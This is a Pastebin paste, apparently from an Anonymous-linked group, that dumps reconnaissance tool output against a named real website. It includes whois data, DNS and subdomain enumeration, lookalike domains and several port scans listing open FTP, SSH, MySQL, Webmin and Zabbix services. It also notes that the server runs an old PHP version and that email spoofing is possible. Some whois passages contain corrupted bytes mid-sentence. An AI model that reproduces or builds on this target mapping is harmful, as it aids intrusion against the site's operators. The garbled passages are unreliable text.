Advertisement
Guest User

Anonymous JTSEC #OpDeathEathers full Recon #11

a guest
Sep 15th, 2018
1,057
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 114.72 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname www.vcteens.com ISP Leaseweb USA, Inc.
  3. Continent North America Flag
  4. US
  5. Country United States Country Code US
  6. Region Delaware Local time 15 Sep 2018 12:12 EDT
  7. City Unknown Postal Code Unknown
  8. IP Address 108.59.1.220 Latitude 39.673
  9. Longitude -75.705
  10.  
  11. #######################################################################################################################################
  12. HostIP:108.59.1.220
  13. HostName:vcteens.com
  14.  
  15. Gathered Inet-whois information for 108.59.1.220
  16. ---------------------------------------------------------------------------------------------------------------------------------------
  17.  
  18.  
  19. inetnum: 108.0.0.0 - 108.255.255.255
  20. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  21. descr: IPv4 address block not managed by the RIPE NCC
  22. remarks: ------------------------------------------------------
  23. remarks:
  24. remarks: You can find the whois server to query, or the
  25. remarks: IANA registry to query on this web page:
  26. remarks: http://www.iana.org/assignments/ipv4-address-space
  27. remarks:
  28. remarks: You can access databases of other RIRs at:
  29. remarks:
  30. remarks: AFRINIC (Africa)
  31. remarks: http://www.afrinic.net/ whois.afrinic.net
  32. remarks:
  33. remarks: APNIC (Asia Pacific)
  34. remarks: http://www.apnic.net/ whois.apnic.net
  35. remarks:
  36. remarks: ARIN (Northern America)
  37. remarks: http://www.arin.net/ whois.arin.net
  38. remarks:
  39. remarks: LACNIC (Latin America and the Carribean)
  40. remarks: http://www.lacnic.net/ whois.lacnic.net
  41. remarks:
  42. remarks: IANA IPV4 Recovered Address Space
  43. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  44. remarks:
  45. remarks: ------------------------------------------------------
  46. country: EU # Country is really world wide
  47. admin-c: IANA1-RIPE
  48. tech-c: IANA1-RIPE
  49. status: ALLOCATED UNSPECIFIED
  50. mnt-by: RIPE-NCC-HM-MNT
  51. mnt-lower: RIPE-NCC-HM-MNT
  52. created: 2014-11-07T14:14:44Z
  53. last-modified: 2018-09-04T13:31:01Z
  54. source: RIPE
  55.  
  56. role: Internet Assigned Numbers Authority
  57. address: see http://www.iana.org.
  58. admin-c: IANA1-RIPE
  59. tech-c: IANA1-RIPE
  60. nic-hdl: IANA1-RIPE
  61. remarks: For more information on IANA services
  62. remarks: go to IANA web site at http://www.iana.org.
  63. mnt-by: RIPE-NCC-MNT
  64. created: 1970-01-01T00:00:00Z
  65. last-modified: 2001-09-22T09:31:27Z
  66. source: RIPE # Filtered
  67.  
  68. % This query was served by the RIPE Database Query Service version 1.92.5 (BLAARKOP)
  69.  
  70.  
  71.  
  72. Gathered Inic-whois information for vcteens.com
  73. ---------------------------------------------------------------------------------------------------------------------------------------
  74. Domain Name: VCTEENS.COM
  75. Registry Domain ID: 1453231464_DOMAIN_COM-VRSN
  76. Registrar WHOIS Server: whois.danesconames.com
  77. Registrar URL: http://www.danesconames.com
  78. Updated Date: 2018-04-25T04:20:16Z
  79. Creation Date: 2008-04-19T11:34:15Z
  80. Registry Expiry Date: 2019-04-19T11:34:15Z
  81. Registrar: Danesco Trading Ltd.
  82. Registrar IANA ID: 1418
  83. Registrar Abuse Contact Email: abuse@danesconames.com
  84. Registrar Abuse Contact Phone: +357.95713635
  85. Domain Status: ok https://icann.org/epp#ok
  86. Name Server: NS1.OLDMANWISH.COM
  87. Name Server: NS2.OLDMANWISH.COM
  88. DNSSEC: unsigned
  89. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  90. >>> Last update of whois database: 2018-09-15T16:17:04Z <<<
  91.  
  92. For more information on Whois status codes, please visit https://icann.org/epp
  93.  
  94. NOTICE: The expiration date displayed in this record is the date the
  95. registrar's sponsorship of the domain name registration in the registry is
  96. currently set to expire. This date does not neceYV@ssari��,S�ly� refle\%c?�ctXV@ the i%c?�exgV@pirat��������ion
  97. date of the domain name registrant's agreement with the sponsoring
  98. registrar. Users may consult the sponsoring registrar's Whois database to
  99. view the registrar's reported date of expiration for this registration.
  100.  
  101. TERMS OF USE: You are not authorized to access or query our Whois
  102. database through the use of electronic processes that are high-volume and
  103. automated except as reasonably necessary to register domain names or
  104. h%c?�y existing registrations; the Data in VeriS�U@ign G��,S�lo�bal Reb%c?�giU@stry
  105. Services' ("VeriSign") Whois database is provided by VeriSign for
  106. information purposes only, and to assist persons in obtaining information
  107. about or related to a domain name registration record. VeriSign does not
  108. guarantee its accuracy. By submitting a Whois query, you agree to abide
  109. by the following terms of use: You agree that you may use this Data only
  110. for lawful purposes and that under no circumstan�U@ Data��,S�
  111. to: (1) allow, enable, or otherwise support the transmission of mass
  112. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  113. or facsimile; or (2) enable high volume, automated, electronic processes
  114. that apply to VeriSign (or its computer systems). The compilation,
  115. repackaging, dissemination or other use of this Data is expressly
  116. prohibited without the prior written consent of VeriSign. You agree not to
  117. use electronic processes that are automated and �U@o accT�,S�es s or
  118. query the Whois database except as reasonably necessary to register
  119. domain names or modify existing registrations. VeriSign reserves the right
  120. to restrict your access to the Whois database in its sole discretion to ensure
  121. operational stability. VeriSign may restrict or terminate your access to the
  122. Whois database for failure to abide by these terms of use. VeriSign
  123. reserves the right to modify these terms at any time.
  124.  
  125. The Registry database contains ONLY .COM, .NET, YV@ins a��,S�nd
  126. Registrars.
  127.  
  128. Gathered Netcraft information for vcteens.com
  129. ---------------------------------------------------------------------------------------------------------------------------------------
  130.  
  131. Retrieving Netcraft.com information for vcteens.com
  132. Netcraft.com Information gathered
  133.  
  134. Gathered Subdomain information for vcteens.com
  135. ---------------------------------------------------------------------------------------------------------------------------------------
  136. Searching Google.com:80...
  137. Searching Altavista.com:80...
  138. Found 0 possible subdomain(s) for host vcteens.com, Searched 0 pages containing 0 results
  139.  
  140. Gathered E-Mail information for vcteens.com
  141. ---------------------------------------------------------------------------------------------------------------------------------------
  142. Searching Google.com:80...
  143. Searching Altavista.com:80...
  144. Found 0 E-Mail(s) for host vcteens.com, Searched 0 pages containing 0 results
  145.  
  146. Gathered TCP Port information for 108.59.1.220
  147. ---------------------------------------------------------------------------------------------------------------------------------------
  148.  
  149. Port State
  150.  
  151. 21/tcp open
  152. 22/tcp open
  153. 53/tcp open
  154. 80/tcp open
  155. 81/tcp open
  156. 110/tcp open
  157. 143/tcp open
  158.  
  159. Portscan Finished: Scanned 150 ports, 136 ports were in state closed
  160.  
  161. #######################################################################################################################################
  162. [i] Scanning Site: http://vcteens.com
  163.  
  164.  
  165.  
  166. B A S I C I N F O
  167. =======================================================================================================================================
  168.  
  169.  
  170. [+] Site Title: VCTeens.com - Teens Virtual Channel
  171. [+] IP address: 108.59.1.220
  172. [+] Web Server: nginx/1.9.5
  173. [+] CMS: Could Not Detect
  174. [+] Cloudflare: Not Detected
  175. [+] Robots File: Could NOT Find robots.txt!
  176.  
  177.  
  178.  
  179.  
  180. W H O I S L O O K U P
  181. =======================================================================================================================================
  182.  
  183. Domain Name: VCTEENS.COM
  184. Registry Domain ID: 1453231464_DOMAIN_COM-VRSN
  185. Registrar WHOIS Server: whois.danesconames.com
  186. Registrar URL: http://www.danesconames.com
  187. Updated Date: 2018-04-25T04:20:16Z
  188. Creation Date: 2008-04-19T11:34:15Z
  189. Registry Expiry Date: 2019-04-19T11:34:15Z
  190. Registrar: Danesco Trading Ltd.
  191. Registrar IANA ID: 1418
  192. Registrar Abuse Contact Email: abuse@danesconames.com
  193. Registrar Abuse Contact Phone: +357.95713635
  194. Domain Status: ok https://icann.org/epp#ok
  195. Name Server: NS1.OLDMANWISH.COM
  196. Name Server: NS2.OLDMANWISH.COM
  197. DNSSEC: unsigned
  198. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  199. >>> Last update of whois database: 2018-09-15T16:17:04Z <<<
  200.  
  201. For more information on Whois status codes, please visit https://icann.org/epp
  202.  
  203.  
  204.  
  205. The Registry database contains ONLY .COM, .NET, .EDU domains and
  206. Registrars.
  207.  
  208.  
  209.  
  210.  
  211.  
  212. H T T P H E A D E R S
  213. =======================================================================================================================================
  214.  
  215.  
  216. [i] HTTP/1.1 200 OK
  217. [i] Server: nginx/1.9.5
  218. [i] Date: Sat, 15 Sep 2018 14:27:54 GMT
  219. [i] Content-Type: text/html
  220. [i] Connection: close
  221. [i] X-Powered-By: PHP/5.2.17
  222.  
  223.  
  224.  
  225.  
  226. D N S L O O K U P
  227. =======================================================================================================================================
  228.  
  229. ;; Truncated, retrying in TCP mode.
  230. vcteens.com. 38400 IN SOA lcwmlm431.amhost.net. root.lcwmlm431.amhost.net. 1442504668 10800 3600 604800 38400
  231. vcteens.com. 38400 IN MX 5 mail.vcteens.com.
  232. vcteens.com. 38400 IN NS lcwmlm431.amhost.net.
  233. vcteens.com. 38400 IN A 108.59.1.220
  234.  
  235.  
  236.  
  237.  
  238. N M A P P O R T S C A N
  239. =======================================================================================================================================
  240.  
  241.  
  242. Starting Nmap 7.40 ( https://nmap.org ) at 2018-09-15 16:17 UTC
  243. Nmap scan report for vcteens.com (108.59.1.220)
  244. Host is up (0.0073s latency).
  245. PORT STATE SERVICE
  246. 21/tcp open ftp
  247. 22/tcp open ssh
  248. 23/tcp closed telnet
  249. 80/tcp open http
  250. 110/tcp open pop3
  251. 143/tcp open imap
  252. 443/tcp open https
  253. 3389/tcp closed ms-wbt-server
  254.  
  255. Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
  256.  
  257. #######################################################################################################################################
  258. [?] Enter the target: http://www.vcteens.com/
  259. [!] IP Address : 108.59.1.220
  260. [!] Server: nginx/1.9.5
  261. [!] Powered By: PHP/5.2.17
  262. [+] Clickjacking protection is not in place.
  263. [!] www.vcteens.com doesn't seem to use a CMS
  264. [+] Honeypot Probabilty: 30%
  265. ---------------------------------------------------------------------------------------------------------------------------------------
  266. [~] Trying to gather whois information for www.vcteens.com
  267. [+] Whois information found
  268. [-] Unable to build response, visit https://who.is/whois/www.vcteens.com
  269. ---------------------------------------------------------------------------------------------------------------------------------------
  270. PORT STATE SERVICE
  271. 21/tcp open ftp
  272. 22/tcp open ssh
  273. 23/tcp closed telnet
  274. 80/tcp open http
  275. 110/tcp open pop3
  276. 143/tcp open imap
  277. 443/tcp open https
  278. 3389/tcp closed ms-wbt-server
  279. Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
  280. --------------------------------------------------------------------------------------------------------------------------------------
  281. #######################################################################################################################################
  282. [+] Hosting Info for Website: vcteens.com
  283. [+] Visitors per day: < 200
  284. [+] IP Address: ...
  285. [+] IP Reverse DNS (Host): 108.59.1.220
  286. [+] Hosting IP Range: 108.59.0.0 - 108.59.15.255 (4,096 ip)
  287. [+] Hosting Address: Private Residence, Panama, PA
  288. [+] Hosting Country: PAN
  289. [+] Hosting Phone: +1-571-814-3777
  290. [+] Hosting Website: 1
  291. [+] CIDR: 108.59.12.230/31, 108.59.12.244/32, 108.59.12.232/29, 108.59.12.240/30
  292. [+] Hosting CIDR: 108.59.0.0/20
  293.  
  294. [+] NS: lcwmlm431.amhost.net
  295. #######################################################################################################################################
  296.  
  297. Start: 2018-09-15T16:19:07+0000
  298. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  299. 1.|-- 45.79.12.202 0.0% 3 0.9 1.0 0.7 1.3 0.3
  300. 2.|-- 45.79.12.6 0.0% 3 0.9 2.7 0.9 6.1 2.9
  301. 3.|-- 45.79.12.8 0.0% 3 1.4 1.0 0.7 1.4 0.3
  302. 4.|-- chi-ms1.us.leaseweb.net 0.0% 3 8.4 4.2 1.1 8.4 3.7
  303. 5.|-- te-3-4.bb01.wdc-01.leaseweb.net 33.3% 3 31.0 31.2 31.0 31.3 0.2
  304. 6.|-- ae-51.br01.wdc-01.us.leaseweb.net 0.0% 3 31.2 31.3 30.9 31.8 0.5
  305. 7.|-- po-5.ce01.wdc-01.us.leaseweb.net 0.0% 3 31.2 31.0 30.8 31.2 0.2
  306. 8.|-- 108.59.1.220 0.0% 3 30.9 31.0 30.8 31.3 0.2
  307.  
  308. #######################################################################################################################################
  309. [*] Performing General Enumeration of Domain: vcteens.com
  310. [-] DNSSEC is not configured for vcteens.com
  311. [-] Error while resolving SOA record.
  312. [*] MX mail.vcteens.com 108.59.1.220
  313. [*] A vcteens.com 108.59.1.220
  314. [*] Enumerating SRV Records
  315. [-] No SRV Records Found for vcteens.com
  316. [+] 0 Records Found
  317. #######################################################################################################################################
  318. [*] Processing domain vcteens.com
  319. [+] Getting nameservers
  320. [-] Getting nameservers failed
  321. [-] Zone transfer failed
  322.  
  323. [+] MX records found, added to target list
  324. 5 mail.vcteens.com.
  325.  
  326. [*] Scanning vcteens.com for A records
  327. 108.59.1.220 - vcteens.com
  328. 108.59.1.220 - admin.vcteens.com
  329. 108.59.1.220 - ftp.vcteens.com
  330. 127.0.0.1 - localhost.vcteens.com
  331. 108.59.1.220 - m.vcteens.com
  332. 108.59.1.220 - mail.vcteens.com
  333. 108.59.1.220 - webmail.vcteens.com
  334. 108.59.1.220 - www.vcteens.com
  335. #######################################################################################################################################
  336. Original* vcteens.com 108.59.1.220 NS:lcwmlm431.amhost.net MX:mail.vcteens.com
  337. Bitsquatting tcteens.com 50.63.21.23 NS:ns09.domaincontrol.com MX:mailstore1.secureserver.net
  338. Bitsquatting rcteens.com MX:city.ci.rancho-cucamonga.ca.us
  339. Bitsquatting vbteens.com 74.220.219.74 NS:ns-1053.awsdns-03.org MX:alt1.aspmx.l.google.com
  340. Bitsquatting vateens.com 107.179.53.104 NS:v1.dns234.net
  341. Omission vteens.com 141.0.173.27 NS:ns1.serverstack.com MX:vteens.com
  342. Omission cteens.com 72.52.4.119 NS:ns1.sedoparking.com MX:localhost
  343. Omission vceens.com -
  344. Omission vctees.com 216.239.32.21 2001:4860:4802:32::15 NS:ns71.domaincontrol.com MX:vctees-com.mail.protection.outlook.com
  345. Replacement bcteens.com 66.254.98.30 NS:ns0.reflected.net
  346. Replacement vxteens.com 23.111.130.213 NS:ns1.easyxsites.com MX:vxteens.com
  347. Subdomain v.cteens.com 72.52.4.119 NS:ns1.sedoparking.com MX:localhost
  348. Subdomain vc.teens.com 64.38.232.180
  349. Subdomain vct.eens.com 68.178.213.61
  350. Subdomain vcte.ens.com -
  351. Subdomain vctee.ns.com 75.126.100.21
  352. #######################################################################################################################################
  353. [+] PORT STATE SERVICE
  354. [+] 21 Closed FTP
  355. [+] 22 Closed SSH
  356. [+] 23 Closed Telnet
  357. [+] 25 Closed SMTP
  358. [+] 43 Closed Whois
  359. [+] 53 Closed DNS
  360. [+] 68 Closed DHCP
  361. [+] 80 Closed HTTP
  362. [+] 110 Closed POP3
  363. [+] 115 Closed SFTP
  364. [+] 119 Closed NNTP
  365. [+] 123 Closed NTP
  366. [+] 139 Closed NetBIOS
  367. [+] 143 Closed IMAP
  368. [+] 161 Closed SNMP
  369. [+] 220 Closed IMAP3
  370. [+] 389 Closed LDAP
  371. [+] 443 Closed SSL
  372. [+] 1521 Closed Oracle SQL
  373. [+] 2049 Closed NFS
  374. [+] 3306 Closed mySQL
  375. [+] 5800 Closed VNC
  376. [+] 8080 Closed HTTP
  377. #######################################################################################################################################
  378.  
  379. Starting Nmap 7.40 ( https://nmap.org ) at 2018-09-15 17:27 UTC
  380. Nmap scan report for www.vcteens.com (108.59.1.220)
  381. Host is up (0.0071s latency).
  382. PORT STATE SERVICE
  383. 21/tcp open ftp
  384. 22/tcp open ssh
  385. 23/tcp closed telnet
  386. 80/tcp open http
  387. 110/tcp open pop3
  388. 143/tcp open imap
  389. 443/tcp open https
  390. 3389/tcp closed ms-wbt-server
  391.  
  392. Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
  393. #######################################################################################################################################
  394. dnsenum VERSION:1.2.4
  395.  
  396. ----- vcteens.com -----
  397.  
  398.  
  399. Host's addresses:
  400. __________________
  401.  
  402. vcteens.com. 38400 IN A 108.59.1.220
  403.  
  404.  
  405. Name Servers:
  406. ______________
  407.  
  408.  
  409.  
  410. Mail (MX) Servers:
  411. ___________________
  412.  
  413. mail.vcteens.com. 38400 IN A 108.59.1.220
  414.  
  415.  
  416. Trying Zone Transfers and getting Bind Versions:
  417. _________________________________________________
  418.  
  419.  
  420. Trying Zone Transfer for vcteens.com on lcwmlm431.amhost.net ...
  421.  
  422. brute force file not specified, bay.
  423. #######################################################################################################################################
  424. Domain Name: VCTEENS.COM
  425. Registry Domain ID: 1453231464_DOMAIN_COM-VRSN
  426. Registrar WHOIS Server: whois.danesconames.com
  427. Registrar URL: http://www.danesconames.com
  428. Updated Date: 2018-04-25T04:20:16Z
  429. Creation Date: 2008-04-19T11:34:15Z
  430. Registry Expiry Date: 2019-04-19T11:34:15Z
  431. Registrar: Danesco Trading Ltd.
  432. Registrar IANA ID: 1418
  433. Registrar Abuse Contact Email: abuse@danesconames.com
  434. Registrar Abuse Contact Phone: +357.95713635
  435. Domain Status: ok https://icann.org/epp#ok
  436. Name Server: NS1.OLDMANWISH.COM
  437. Name Server: NS2.OLDMANWISH.COM
  438. DNSSEC: unsigned
  439. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  440. >>> Last update of whois database: 2018-09-15T23:23:39Z <<<
  441.  
  442. For more information on Whois status codes, please visit https://icann.org/epp
  443.  
  444. NOTICE: The expiration date displayed in this record is the date the
  445. registrar's sponsorship of the domain name registration in the registry is
  446. currently set to expire. This date does not necessarily reflect the expiration
  447. date of the domain name registrant's agreement with the sponsoring
  448. registrar. Users may consult the sponsoring registrar's Whois database to
  449. view the registrar's reported date of expiration for this registration.
  450.  
  451. TERMS OF USE: You are not authorized to access or query our Whois
  452. database through the use of electronic processes that are high-volume and
  453. automated except as reasonably necessary to register domain names or
  454. modify existing registrations; the Data in VeriSign Global Registry
  455. Services' ("VeriSign") Whois database is provided by VeriSign for
  456. information purposes only, and to assist persons in obtaining information
  457. about or related to a domain name registration record. VeriSign does not
  458. guarantee its accuracy. By submitting a Whois query, you agree to abide
  459. by the following terms of use: You agree that you may use this Data only
  460. for lawful purposes and that under no circumstances will you use this Data
  461. to: (1) allow, enable, or otherwise support the transmission of mass
  462. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  463. or facsimile; or (2) enable high volume, automated, electronic processes
  464. that apply to VeriSign (or its computer systems). The compilation,
  465. repackaging, dissemination or other use of this Data is expressly
  466. prohibited without the prior written consent of VeriSign. You agree not to
  467. use electronic processes that are automated and high-volume to access or
  468. query the Whois database except as reasonably necessary to register
  469. domain names or modify existing registrations. VeriSign reserves the right
  470. to restrict your access to the Whois database in its sole discretion to ensure
  471. operational stability. VeriSign may restrict or terminate your access to the
  472. Whois database for failure to abide by these terms of use. VeriSign
  473. reserves the right to modify these terms at any time.
  474.  
  475. The Registry database contains ONLY .COM, .NET, .EDU domains and
  476. Registrars.
  477.  
  478. Domain Name: VCTEENS.COM
  479. Registry Domain ID:
  480. Registrar WHOIS Server: whois.danesconames.com
  481. Registrar URL: https://danesconames.com/
  482. Updated Date: 2018-06-06 07:42:14.398531
  483. Creation Date: 2008-04-19
  484. Registrar Registration Expiration Date: 2019-04-19
  485. Registrar: DANESCO TRADING LTD
  486. Registrar IANA ID: 1418
  487. Registrar Abuse Contact Email: abuse@danesconames.com
  488. Registrar Abuse Contact Phone: +357.95713635
  489. Reseller: AHnames.com https://www.AHnames.com/
  490. Domain Status: ok
  491. Registry Registrant ID: MR_10854742WP
  492. Registrant Name: WhoisProtectService.net
  493. Registrant Organization: PROTECTSERVICE, LTD.
  494. Registrant Street: Agios Fylaxeos 66 and Chr. Perevou 2, Kalia Court, off. 601
  495. Registrant City: Limassol
  496. Registrant State/Province:
  497. Registrant Postal Code: 3025
  498. Registrant Country: Cyprus
  499. Registrant Phone: +357.95713635
  500. Registrant Phone Ext:
  501. Registrant Fax: +357.95713635
  502. Registrant Fax Ext:
  503. Registrant Email: vcteens.com@whoisprotectservice.net
  504. Registry Admin ID: MR_10854742WP
  505. Admin Name: WhoisProtectService.net
  506. Admin Organization: PROTECTSERVICE, LTD.
  507. Admin Street: Agios Fylaxeos 66 and Chr. Perevou 2, Kalia Court, off. 601
  508. Admin City: Limassol
  509. Admin State/Province:
  510. Admin Postal Code: 3025
  511. Admin Country: Cyprus
  512. Admin Phone: +357.95713635
  513. Admin Phone Ext:
  514. Admin Fax: +357.95713635
  515. Admin Fax Ext:
  516. Admin Email: vcteens.com@whoisprotectservice.net
  517. Registry Tech ID: MR_10854742WP
  518. Tech Name: WhoisProtectService.net
  519. Tech Organization: PROTECTSERVICE, LTD.
  520. Tech Street: Agios Fylaxeos 66 and Chr. Perevou 2, Kalia Court, off. 601
  521. Tech City: Limassol
  522. Tech State/Province:
  523. Tech Postal Code: 3025
  524. Tech Country: Cyprus
  525. Tech Phone: +357.95713635
  526. Tech Phone Ext:
  527. Tech Fax: +357.95713635
  528. Tech Fax Ext:
  529. Tech Email: vcteens.com@whoisprotectservice.net
  530. Registry Billing ID: MR_10854742WP
  531. Billing Name: WhoisProtectService.net
  532. Billing Organization: PROTECTSERVICE, LTD.
  533. Billing Street: Agios Fylaxeos 66 and Chr. Perevou 2, Kalia Court, off. 601
  534. Billing City: Limassol
  535. Billing State/Province:
  536. Billing Postal Code: 3025
  537. Billing Country: Cyprus
  538. Billing Phone: +357.95713635
  539. Billing Phone Ext:
  540. Billing Fax: +357.95713635
  541. Billing Fax Ext:
  542. Billing Email: vcteens.com@whoisprotectservice.net
  543. Name Server: NS1.OLDMANWISH.COM
  544. Name Server: NS2.OLDMANWISH.COM
  545. DNSSEC: unsigned
  546. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
  547. >>> Last update of WHOIS database: 2018-09-01 14:25:50 <<<
  548.  
  549. Abuse email: abuse@ahnames.com
  550. #######################################################################################################################################
  551.  
  552. [-] Enumerating subdomains now for vcteens.com
  553. [-] verbosity is enabled, will show the subdomains results in realtime
  554. [-] Searching now in Baidu..
  555. [-] Searching now in Yahoo..
  556. [-] Searching now in Google..
  557. [-] Searching now in Bing..
  558. [-] Searching now in Ask..
  559. [-] Searching now in Netcraft..
  560. [-] Searching now in DNSdumpster..
  561. [-] Searching now in Virustotal..
  562. [-] Searching now in ThreatCrowd..
  563. [-] Searching now in SSL Certificates..
  564. [-] Searching now in PassiveDNS..
  565. Virustotal: www.vcteens.com
  566. Virustotal: mail.vcteens.com
  567. Virustotal: ftp.vcteens.com
  568. DNSdumpster: mail.vcteens.com
  569. Yahoo: www.vcteens.com
  570. Yahoo: mail.vcteens.com
  571. [-] Saving results to file: /usr/share/sniper/loot/vcteens.com/domains/domains-vcteens.com.txt
  572. [-] Total Unique Subdomains Found: 3
  573. www.vcteens.com
  574. ftp.vcteens.com
  575. mail.vcteens.com
  576. #######################################################################################################################################
  577. [+] vcteens.com has no SPF record!
  578. [*] No DMARC record found. Looking for organizational record
  579. [+] No organizational DMARC record
  580. [+] Spoofing possible for vcteens.com!
  581. #######################################################################################################################################
  582.  
  583. INFO[0000] Starting to process queue....
  584. INFO[0000] Starting to process permutations....
  585. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  586. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  587. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  588. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  589. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  590. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  591. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  592. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  593. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  594. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  595. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  596. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  597. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  598. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  599. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  600. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  601. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  602. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  603. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  604. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  605. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  606. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  607. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  608. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  609. ERRO[0001] Get http://s3-1-w.amazonaws.com: dial tcp 52.216.84.40:80: getsockopt: connection refused
  610. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59588->52.216.84.40:80: read: connection reset by peer
  611. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59592->52.216.84.40:80: read: connection reset by peer
  612. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59586->52.216.84.40:80: read: connection reset by peer
  613. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59574->52.216.84.40:80: read: connection reset by peer
  614. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59602->52.216.84.40:80: read: connection reset by peer
  615. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59610->52.216.84.40:80: read: connection reset by peer
  616. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59580->52.216.84.40:80: read: connection reset by peer
  617. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59604->52.216.84.40:80: read: connection reset by peer
  618. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59608->52.216.84.40:80: read: connection reset by peer
  619. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59536->52.216.84.40:80: read: connection reset by peer
  620. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59590->52.216.84.40:80: read: connection reset by peer
  621. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59596->52.216.84.40:80: read: connection reset by peer
  622. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59598->52.216.84.40:80: read: connection reset by peer
  623. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59594->52.216.84.40:80: read: connection reset by peer
  624. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59606->52.216.84.40:80: read: connection reset by peer
  625. ERRO[0001] Get http://s3-1-w.amazonaws.com: read tcp 10.211.1.185:59600->52.216.84.40:80: read: connection reset by peer
  626. #######################################################################################################################################
  627. --------------------------------------------------------------------------------------------------------------------------------------
  628.  
  629. Total hosts: 5
  630.  
  631. [-] Resolving hostnames IPs...
  632.  
  633. ftp.vcteens.com : 108.59.1.220
  634. mail.vcteens.com : 108.59.1.220
  635. www.vcteens.com : 108.59.1.220
  636.  
  637. [+] Virtual hosts:
  638. ---------------------------------------------------------------------------------------------------------------------------------------
  639. #######################################################################################################################################
  640. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:26 EDT
  641. Warning: 108.59.1.220 giving up on port because retransmission cap hit (2).
  642. Nmap scan report for vcteens.com (108.59.1.220)
  643. Host is up (0.50s latency).
  644. Not shown: 457 closed ports, 6 filtered ports
  645. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  646. PORT STATE SERVICE
  647. 21/tcp open ftp
  648. 22/tcp open ssh
  649. 53/tcp open domain
  650. 80/tcp open http
  651. 81/tcp open hosts2-ns
  652. 110/tcp open pop3
  653. 143/tcp open imap
  654. 443/tcp open https
  655. 993/tcp open imaps
  656. 995/tcp open pop3s
  657. 3306/tcp open mysql
  658. 10000/tcp open snet-sensor-mgmt
  659. 10050/tcp open zabbix-agent
  660. #######################################################################################################################################
  661. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:27 EDT
  662. Nmap scan report for vcteens.com (108.59.1.220)
  663. Host is up (0.59s latency).
  664.  
  665. PORT STATE SERVICE
  666. 53/udp open domain
  667. 67/udp open|filtered dhcps
  668. 68/udp open|filtered dhcpc
  669. 69/udp open|filtered tftp
  670. 88/udp open|filtered kerberos-sec
